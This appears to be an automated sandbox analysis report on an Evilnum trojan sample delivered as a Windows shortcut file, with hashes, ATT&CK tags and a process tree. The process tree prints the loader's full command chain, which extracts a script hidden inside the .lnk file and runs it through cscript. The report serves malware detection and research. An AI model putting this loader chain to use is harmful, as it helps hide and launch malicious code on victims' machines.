evilnum | 9666285017da522bc193fdfa89ecec0ebb8f382aed04260f9c3dc6520bcb23b5

Analysis

Target

9666285017da522bc193fdfa89ecec0ebb8f382aed04260f9c3dc6520bcb23b5.lnk
Size

69KB
MD5

c32820d1eb296d44c56f8430584d9d69
SHA1

a2dbd75dd079594d36509f5ef84a22f869df68cf
SHA256

9666285017da522bc193fdfa89ecec0ebb8f382aed04260f9c3dc6520bcb23b5
SHA512

7a2fde5f81d4b96314340c412c19e1e4d075c6ef9b52969470d46a4bcafd1bf39deeca97d60921d1d27f665bd15e8ba635bf72a24799899566de4d5ad5226780

Score

10^/10

evilnum trojan

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 4056 wrote to memory of 4016	4056	cmd.exe	70
PID 4056 wrote to memory of 4016	4056	cmd.exe	70
PID 4016 wrote to memory of 4320	4016	cmd.exe	71
PID 4016 wrote to memory of 4320	4016	cmd.exe	71
PID 4016 wrote to memory of 4300	4016	cmd.exe	72
PID 4016 wrote to memory of 4300	4016	cmd.exe	72
PID 4016 wrote to memory of 4276	4016	cmd.exe	73
PID 4016 wrote to memory of 4276	4016	cmd.exe	73
PID 4016 wrote to memory of 4336	4016	cmd.exe	74
PID 4016 wrote to memory of 4336	4016	cmd.exe	74
PID 4016 wrote to memory of 4256	4016	cmd.exe	75
PID 4016 wrote to memory of 4256	4016	cmd.exe	75

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\9666285017da522bc193fdfa89ecec0ebb8f382aed04260f9c3dc6520bcb23b5.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:4056
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "2.png*lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "2.pn*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cScRiPt "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4016
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "2.pn*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:4320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:4300
- - C:\Windows\system32\find.exe
    find "TRU4"
    3⤵
    PID:4276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:4336
- - C:\Windows\system32\cscript.exe
    cScRiPt "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:4256

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact